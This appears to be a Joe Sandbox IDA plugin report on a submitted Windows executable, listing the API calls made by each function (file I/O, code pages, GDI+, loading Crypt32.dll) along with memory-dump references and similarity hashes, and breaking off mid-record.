                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 3vo
                • API String ID: 1269201914-2837116934
                • Opcode ID: d0630757801e1881844bf0e1e03785f44b81a06519053728583a7da267a4dab6
                • Instruction ID: 1a3c8ae6ff28f5c66d689c196262244453a1766f04529078c3ced5be3202c11c
                • Opcode Fuzzy Hash: d0630757801e1881844bf0e1e03785f44b81a06519053728583a7da267a4dab6
                • Instruction Fuzzy Hash: 4AB012E1A6E0417C320C9143BD0AC3A071CD7C0B52B30C01FB305D40C095849C0A403B
                APIs
                  • Part of subcall function 004FAF1B: GetOEMCP.KERNEL32(00000000,?,?,004FB1A5,?), ref: 004FAF46
                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,004FB1EA,?,00000000), ref: 004FB3C4
                • GetCPInfo.KERNEL32(00000000,004FB1EA,?,?,?,004FB1EA,?,00000000), ref: 004FB3D7
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CodeInfoPageValid
                • String ID:
                • API String ID: 546120528-0
                • Opcode ID: c4946babde3ebda1a15ac2f6d2f9e70f6d08a266036112ba728cd893dfc95f96
                • Instruction ID: c8501d85ef71bc49412ddb61f22524df261be61a3c835daf360e6341c6020700
                • Opcode Fuzzy Hash: c4946babde3ebda1a15ac2f6d2f9e70f6d08a266036112ba728cd893dfc95f96
                • Instruction Fuzzy Hash: 1A5159B09002099EDB24DF32C8816BBBBE5EF42314F18846FD6868B253D73D9546CBD9
                APIs
                • __EH_prolog.LIBCMT ref: 004D1385
                  • Part of subcall function 004D6057: __EH_prolog.LIBCMT ref: 004D605C
                  • Part of subcall function 004DC827: __EH_prolog.LIBCMT ref: 004DC82C
                  • Part of subcall function 004DC827: new.LIBCMT ref: 004DC86F
                  • Part of subcall function 004DC827: new.LIBCMT ref: 004DC893
                • new.LIBCMT ref: 004D13FE
                  • Part of subcall function 004DB07D: __EH_prolog.LIBCMT ref: 004DB082
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 547d2e3847122d47e9d04b2db0e0debad0203edd2a611b78b39f56ecc1351333
                • Instruction ID: 10f172b06834063537014ef9ce173806b92cfc9fcbe26723c1fa7bf61f02d49d
                • Opcode Fuzzy Hash: 547d2e3847122d47e9d04b2db0e0debad0203edd2a611b78b39f56ecc1351333
                • Instruction Fuzzy Hash: 424124B0805B409EE724DF7A84959E7FAE5FB18304F404A2FD6EE83282CB366554CB19
                APIs
                • __EH_prolog.LIBCMT ref: 004D1385
                  • Part of subcall function 004D6057: __EH_prolog.LIBCMT ref: 004D605C
                  • Part of subcall function 004DC827: __EH_prolog.LIBCMT ref: 004DC82C
                  • Part of subcall function 004DC827: new.LIBCMT ref: 004DC86F
                  • Part of subcall function 004DC827: new.LIBCMT ref: 004DC893
                • new.LIBCMT ref: 004D13FE
                  • Part of subcall function 004DB07D: __EH_prolog.LIBCMT ref: 004DB082
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: f78f03c7122cbf7d73e9ea5ede19f7ad511158df58e6aaccfc0ecca101b68987
                • Instruction ID: 991ee59132904066112b2a62527935c11357fa69a9853a35884bee3f060724cf
                • Opcode Fuzzy Hash: f78f03c7122cbf7d73e9ea5ede19f7ad511158df58e6aaccfc0ecca101b68987
                • Instruction Fuzzy Hash: 8B4123B0805B409EE724DF7A84959E7FAE5FB18304F404A2FD6EE83282CB366554CB19
                APIs
                • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,004D9EDC,?,?,004D7867), ref: 004D97A6
                • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,004D9EDC,?,?,004D7867), ref: 004D97DB
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 8c1d51388dd124cbf731944f82c6de41a90b109936a8735c2745880cc3a55288
                • Instruction ID: 29fd2262b8df3f736b9d235c133f5fedbb86e4239b719b70bc8a722d4fe151e9
                • Opcode Fuzzy Hash: 8c1d51388dd124cbf731944f82c6de41a90b109936a8735c2745880cc3a55288
                • Instruction Fuzzy Hash: 682104B0510749EED7308F25C895BA7B7E8EB49768F00492FF5E5C2391C378AC498A65
                APIs
                • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004D7547,?,?,?,?), ref: 004D9D7C
                • SetFileTime.KERNELBASE(?,?,?,?), ref: 004D9E2C
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: File$BuffersFlushTime
                • String ID:
                • API String ID: 1392018926-0
                • Opcode ID: 92e883be7a0e1a0b4afbf81689d7c73ccdfc7d9dc37b06abfc6446ee871350ec
                • Instruction ID: cd3e26a246e111e3eb5316f92543573deaadf1562abcec3719d11cb423820778
                • Opcode Fuzzy Hash: 92e883be7a0e1a0b4afbf81689d7c73ccdfc7d9dc37b06abfc6446ee871350ec
                • Instruction Fuzzy Hash: B721A231158286ABC714DE65C461AABBBE5AF56708F08081FB8D1C7341D32DEE0CDB61
                APIs
                • GetProcAddress.KERNEL32(00000000,?), ref: 004FA4B8
                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004FA4C5
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AddressProc__crt_fast_encode_pointer
                • String ID:
                • API String ID: 2279764990-0
                • Opcode ID: 5bed37f866c6bf78326f23532bdfd7d19a082af0e5b7d40c7f87d98a82f98f16
                • Instruction ID: 80609769e79b43dff9831378296034ff862ba7e3dfc344cca79d31a639aabc0c
                • Opcode Fuzzy Hash: 5bed37f866c6bf78326f23532bdfd7d19a082af0e5b7d40c7f87d98a82f98f16
                • Instruction Fuzzy Hash: 13117673A001289BDB26DF28FC4587F7391AB803207164222FE08AB344EB38EC11D3D6
                APIs
                • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,004D9B35,?,?,00000000,?,?,004D8D9C,?), ref: 004D9BC0
                • GetLastError.KERNEL32 ref: 004D9BCD
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: 5e9e40bbbe86136559257fb8ca92c91bbeb093e8854a53e0ebdeeb3857b22b66
                • Instruction ID: 9ddba4cc2490f9baa1a5f62873ebbd611d7c6f4cf9810df209a736ecabf0c1a6
                • Opcode Fuzzy Hash: 5e9e40bbbe86136559257fb8ca92c91bbeb093e8854a53e0ebdeeb3857b22b66
                • Instruction Fuzzy Hash: 2901E1312042059BCB08CE65ACA496FB399BFC1721B15462FF813C3380CA79AC09AA25
                APIs
                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 004D9E76
                • GetLastError.KERNEL32 ref: 004D9E82
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorFileLastPointer
                • String ID:
                • API String ID: 2976181284-0
                • Opcode ID: 71170f41d740bfaabfe7a0dffd5d71100e9ee787fb2cfc9dcccc9bc6faa3865d
                • Instruction ID: 345c8490fb173910cc2b38d67b322cf908d0907aba65c9c3c4b2744da547a773
                • Opcode Fuzzy Hash: 71170f41d740bfaabfe7a0dffd5d71100e9ee787fb2cfc9dcccc9bc6faa3865d
                • Instruction Fuzzy Hash: 19018C713052006BEB349B29D8A8B6BB7D99B89318F144A3FB146C37C0DB79EC888615
                APIs
                • _free.LIBCMT ref: 004F8627
                  • Part of subcall function 004F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004FC13D,00000000,?,004F67E2,?,00000008,?,004F89AD,?,?,?), ref: 004F854A
                • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00510F50,004DCE57,?,?,?,?,?,?), ref: 004F8663
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Heap$AllocAllocate_free
                • String ID:
                • API String ID: 2447670028-0
                • Opcode ID: 4202c0314ba6318fc3aa55020af3969235366d87fce3f3f62403e7b5f494c683
                • Instruction ID: 33ba0d441bf38abab5de5b112bd8477c4706b8c1e10858e3f932b97207d8b302
                • Opcode Fuzzy Hash: 4202c0314ba6318fc3aa55020af3969235366d87fce3f3f62403e7b5f494c683
                • Instruction Fuzzy Hash: 0EF0C23220151D66EB212A22AC01E7F37589FA1BA4F24411FFB14DE391DF2CC80295AD
                APIs
                • GetCurrentProcess.KERNEL32(?,?), ref: 004E0915
                • GetProcessAffinityMask.KERNEL32(00000000), ref: 004E091C
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Process$AffinityCurrentMask
                • String ID:
                • API String ID: 1231390398-0
                • Opcode ID: 1d71070b8ef9a3e5aa33680e859a5ff99317ea5bc2952cb033328f86f0b1c539
                • Instruction ID: 7d34a1daf6b96cdb55089e3815da2827e15205bdc0dffa50ee47bb5adc2da08b
                • Opcode Fuzzy Hash: 1d71070b8ef9a3e5aa33680e859a5ff99317ea5bc2952cb033328f86f0b1c539
                • Instruction Fuzzy Hash: 9FE09BB2A11145ABFF05CEA59C044BF739DDB14312710417BA816D3202F678DD458668
                APIs
                • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,004DA27A,?,?,?,004DA113,?,00000001,00000000,?,?), ref: 004DA458
                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,004DA27A,?,?,?,004DA113,?,00000001,00000000,?,?), ref: 004DA489
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 99faae10d4da3dcef537112a7535d3a6f7067f112aaa3c39376831f194517dea
                • Instruction ID: af090540585afa4bd2bed99a06c5684c35f5a48f2a7365fe1c549e894e7c10f7
                • Opcode Fuzzy Hash: 99faae10d4da3dcef537112a7535d3a6f7067f112aaa3c39376831f194517dea
                • Instruction Fuzzy Hash: 3AF0A03124120DBBDF01AF61DC15FDA376CBB04385F048056BC8886261DB7ACAA8AA54
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ItemText_swprintf
                • String ID:
                • API String ID: 3011073432-0
                • Opcode ID: 86677a5e9278c8211cfe56c93e886b20d605fb2ce976af448e24e5600049877e
                • Instruction ID: de01af463fad86cf8fcc440c8067a7cfaed45f6f4e571b4083e7152ed1decb2c
                • Opcode Fuzzy Hash: 86677a5e9278c8211cfe56c93e886b20d605fb2ce976af448e24e5600049877e
                • Instruction Fuzzy Hash: 28F05C319003887BEF11AB728C02FAA371C9B0434EF00096BB600531A1DEB96A249766
                APIs
                • DeleteFileW.KERNELBASE(?,?,?,004D984C,?,?,004D9688,?,?,?,?,00501FA1,000000FF), ref: 004DA13E
                • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,004D984C,?,?,004D9688,?,?,?,?,00501FA1,000000FF), ref: 004DA16C
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                • Opcode ID: 5d318fe17db42c0c7d06b271d6ef7142267d5dd1d0d51a7702ef7a8c120ec6b2
                • Instruction ID: 2a17764499cb8726f3aec52ef0a135990f6cd3339d60004b47c5bc28139e5416
                • Opcode Fuzzy Hash: 5d318fe17db42c0c7d06b271d6ef7142267d5dd1d0d51a7702ef7a8c120ec6b2
                • Instruction Fuzzy Hash: 72E02234241208ABDB00AF21DC15FEE335CAB08382F484067BC88C3260DB61DDA8AA94
                APIs
                • GdiplusShutdown.GDIPLUS(?,?,?,?,00501FA1,000000FF), ref: 004EA3D1
                • CoUninitialize.COMBASE(?,?,?,?,00501FA1,000000FF), ref: 004EA3D6
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: GdiplusShutdownUninitialize
                • String ID:
                • API String ID: 3856339756-0
                • Opcode ID: 116b51c0daab514ea9ed971fe647db6c1ff0e5ca67bc5ab515e1823149f35d95
                • Instruction ID: 5b908a64954268f836f834055168c1645c24affd4254504dde43ff7b364b61c4
                • Opcode Fuzzy Hash: 116b51c0daab514ea9ed971fe647db6c1ff0e5ca67bc5ab515e1823149f35d95
                • Instruction Fuzzy Hash: 34F03972A18A55EFC7109B4DDD05B59FBADFB89B20F04436AF419837A0CB786800CA95
                APIs
                • GetFileAttributesW.KERNELBASE(?,?,?,004DA189,?,004D76B2,?,?,?,?), ref: 004DA1A5
                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,004DA189,?,004D76B2,?,?,?,?), ref: 004DA1D1
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: a12c516a4d96fb7bd9c96b24c51bd5576c69b92c910275a509ed81b0404dad81
                • Instruction ID: 257512fc934478834c23c96d14b70ab4776c135c754b5bc5faf2c96edb3d1bac
                • Opcode Fuzzy Hash: a12c516a4d96fb7bd9c96b24c51bd5576c69b92c910275a509ed81b0404dad81
                • Instruction Fuzzy Hash: FFE06D355001289BDB20AA699C09BDAB75CAB183A2F0042A3BD44E3390DA74DD589AE5
                APIs
                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004E00A0
                • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004DEB86,Crypt32.dll,00000000,004DEC0A,?,?,004DEBEC,?,?,?), ref: 004E00C2
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: DirectoryLibraryLoadSystem
                • String ID:
                • API String ID: 1175261203-0
                • Opcode ID: 16d7a384cb0633dfe1423c231b701f930afb616022bfddf63e95c8944340530c
                • Instruction ID: 1fa826a89cedcc7fa51fea2c0df33ec965c4942f0e8ab9cc95f5d6cb164ed5dd
                • Opcode Fuzzy Hash: 16d7a384cb0633dfe1423c231b701f930afb616022bfddf63e95c8944340530c
                • Instruction Fuzzy Hash: EEE01B7550215C96DB2196959C09FDA775CEF19392F040496B944D3104D6749A448BE4
                APIs
                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 004E9B30
                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 004E9B37
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: BitmapCreateFromGdipStream
                • String ID:
                • API String ID: 1918208029-0
                • Opcode ID: d313bb865196c6e5c02451f9757f82f62692c767789d0380ff2aedbf4b374562
                • Instruction ID: cf3f64f3d486cc7d70857f8b0bc1157c5fb5eaa07664701d0d05b5d043656d1c
                • Opcode Fuzzy Hash: d313bb865196c6e5c02451f9757f82f62692c767789d0380ff2aedbf4b374562
                • Instruction Fuzzy Hash: E9E0ED71901218EFCB10DF9AD5016AAB7E8EB08322F10809FE99593341E6B56E049B95
                APIs
                  • Part of subcall function 004F329A: try_get_function.LIBVCRUNTIME ref: 004F32AF
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004F217A
                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 004F2185
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                • String ID:
                • API String ID: 806969131-0
                • Opcode ID: 68ac7f8a6e716c8f27efc60a402007f8b428469291e3a9596e60b9d88f011b59
                • Instruction ID: dfe65f1d857c0958f3afbb85d8c79e5764beb54d34b5c386c58496778c1e2230
